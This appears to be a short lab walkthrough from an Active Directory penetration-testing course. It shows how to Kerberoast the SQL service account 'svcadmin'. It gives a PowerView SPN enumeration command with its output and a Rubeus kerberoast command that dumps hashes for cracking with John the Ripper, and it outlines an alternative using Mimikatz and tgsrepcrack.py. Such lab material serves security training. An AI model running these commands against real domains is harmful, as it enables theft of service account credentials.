Obj 14 Kerberoast Pass Crack
Task - Using the Kerberoast attack, crack password of a SQL server service account.
Get Domain User SPN
PS C:\AD\Tools> Get-DomainUser -SPN
Output:
samaccountname : svcadmin
serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}Use Rubeus and John the Ripper to get the hash and crack it
C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple
/rc4opsec /outfile:C:\AD\Tools\hashes.txtWe can now use the file hashes.txt we just created with John the Ripper
- OPTION 2 -
KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py
Use the KerberosRequestorSecurityToken.NET class from PowerShell to request a TGS
Check to see if we have the TGS for the service now
Let's dump the tickets to disk
Now we have a kirbi file we crack with tgsrepcrack.py
Last updated